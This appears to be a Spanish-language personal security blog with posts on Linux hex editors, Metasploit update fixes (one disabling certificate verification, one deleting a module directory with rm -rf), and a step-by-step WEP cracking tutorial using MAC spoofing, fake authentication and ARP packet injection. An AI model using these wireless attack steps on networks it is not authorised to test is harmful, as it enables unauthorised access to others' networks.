sábado, 10 de noviembre de 2012

De editores Hexadecimales y Tux

Editores Hexadecimales en linux

Hoy me llegaron varios mails, con algún malware o botnet y quise ponerme a reversear un rato, pero como es sábado a la noche, no quise entrar al laboratorio sobre windows y preferi hacerlo desde mi ubuntu; Entonces empecé a analizar cuales eran las opciones.
Para empezar para quienes no saben ¿Que es un editor hexadecimal?, acá les transcribo lo q opina Wikipedia:

Un editor hexadecimal (o editor de archivos binarios) es un tipo de programa informático que permite a un usuario modificar archivos binarios. Los editores hexadecimales fueron diseñados para editar sectores de datos de disquetes o discos duros por lo que a veces se llaman "editores de sectores".
Por medio del editor hexadecimal, el usuario puede ver o redactar el contenido intacto y exacto de un archivo. Ocurre lo contrario con otros programas de alto nivel que interpretan el mismo contenido del archivo de forma diferente. Por ejemplo, los datos intactos de la imagen (los raws), y la manera de interpretar el mismo archivo del software de edición de imágenes.
En la mayoría de los editores hexadecimales los datos del archivo son representados como valores hexadecimales agrupados en dos grupos de 8 bytes y un grupo de 16 caracteres ASCII, los caracteres no imprimibles son representados normalmente por un punto "." en ASCII. En Unix, el comando estándar usado para mostrar (aunque no editar) un archivo en hexadecimal y en octal es od

Encontre muchas opciones en linux, desde muy simples a complejas pero les quiero destacar las siguientes que son las q mas me gustaron:
1) GHex/khex



Para instalar sudo apt-get install ghex o tambien pueden descargar el codigo de
git clone http://git.gnome.org/browse/ghex/

2) WHexeditor 




















Descargar Aqui


3)HT 













Descargar de Aqui















sudo apt-get install okteta


Esto ha sido todo, saludos!

viernes, 19 de octubre de 2012

Problemas con Metasploit

Buenas !! Hoy volvi a jugar con mi querido Metasploit, y cuando quise actualizar me tiro el siguiente error:

svn: E175002: Unable to connect to a repository at URL 'https://www.metasploit.com/svn/framework3/trunk'svn: E175002: OPTIONS of 'https://www.metasploit.com/svn/framework3/trunk': Server certificate verification failed: issuer is not trusted (https://www.metasploit.com)


Caramba y ahora?? No encontre mucho en la web, pero pude solucionarlo, lo posteo por si alguien le pasa lo mismo!


Hay que editar el /opt/metasploit/msf3/msfupdate y agregar la siguiente linea:

@args.push("--trust-server-cert") debajo de la linea "@args.push("--non-interactive")

Guardamos y msfupgrade ... y Updated to revision 15990!! ;)

Otro dia, luego de un mes aproximadamente, actualice mi Metasploit en mi ubuntu de 64 y me tire el siguiente error...

svn: En el directorio «modules/auxiliary/scanner/http»
svn: Error procesando la orden «modify-wcprop» en «modules/auxiliary/scanner/http»
svn: «modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb» no está bajo control de versiones
svn: La copia de trabajo «.» está bloqueada
svn: ejecute «svn cleanup»para quitar locks (tipee «svn help cleanup»para más detalles)


Por si les pasa lo solucione borrando el directorio y luego actualice: 
lux@ldesktop:~$ sudo rm -rf /opt/metasploit3/msf3/modules/
lux@ldesktop:~$ sudo msfupdate 


Actualizado a la revisión 16031.

;)








miércoles, 18 de agosto de 2010

Jugando con Aircrack-ng , kismet y Macchanger

Si te olvidaste tu contraseña o tienes ganas de jugar con tu router wifi, hoy comienzo una nueva forma de pasar el tiempo.. En este post hablaremos de como usar las herramientas mas comunes para poder recuperar una clave wep y wpa.
También algunos comandos básicos y conceptos generales para poder llevar a cabo esta practica.
Para empezar una breve descripcion acerca de Aircrack-ng

Aircrack-ng es una herramienta para el  craqueo, que puede recuperar claves con los paquetes de datos capturados. Implementa el ataque estándar FMS con algunas optimizaciones como ataques Korek, así como el ataque PTW totalmente nuevo, lo que hace el ataque mucho más rápido comparado con otras herramientas de cracking WEP. El macchanger sirve naturalmente para cambiar nuesto direccion de mac, y el kismet para realizar un buen espectro de wifi presentes inclusive en conjunto con un Gps.
Para instalarlos  se utilizan los siguientes comandos:

sudo apt-get install aircrack-ng
sudo apt-get install macchanger
sudo apt-get install kismet

airmon-ng

Nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, wlan1,)

airmon-ng stop wlan1

monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.

ifconfig wlan1 down

Tarjeta de red desactiva: no sale nada por pantalla.

macchanger –mac 00:11:22:33:44:55 wlan1

Current mac: xx:xx:xx:xx:xx:xx    Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes.

airmon-ng start wlan1

Monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes)

Se necesita una placa de Wifi que contenga un chipset capaz de ponerse en modo promiscuo o de escucha.

Mi chipset preferido es el de realteak 8187, si bien a veces se cuelga parece ser bastante estable.
Aun asi les dejos este pequeño texto, lo guardas y lo ejecutas cuando se te cuelgue. Basicamente lo que hace es  Recargar los modulos. Esto tambien es util para cuando usamos otro tipo de herramienta
tipo Gerix o Wifite

Script:

 #!/bin/bashecho Remove RTL8187 Module
rmmod rtl8187
rfkill block all
rfkill unblock all
echo Add RTL818& Module
modprobe rtl8187
rfkill unblock all
echo Bring wlan0 Up
ifconfig wlan0 up


 Escaneo de redes y clientes asociados

airodump-ng wlan1

redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR) apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal.

airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID wlan1

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado:   airodump-ng -c 11 -w capturaswifi  – - bssid 00:01:02:03:04:C1

Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!!

Inyección de paquetes para agilizar el proceso de capturas de paquetes

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID wlan1

Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID.  Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED wlan1.

aireplay-ng -3 –b BSID –h 00:11:22:33:44:55  wlan1

Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55  wlan1. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!!

Crackeo WEP

Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.

Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos.

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aircrack-ng –b BSSID ArchivoDeCapturas.cap

Clave WEP encontrada/no encontrada

El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.

Algunas imagenes de Kismet:














Actualizacion: les dejo un link del diario clarín donde aparecemos haciendo un poco de wardriving en un trensito de la alegría.

http://www.clarin.com/sociedad/Persiguiendo-Wi-Fi-calles-Buenos-Aires_0_559144325.html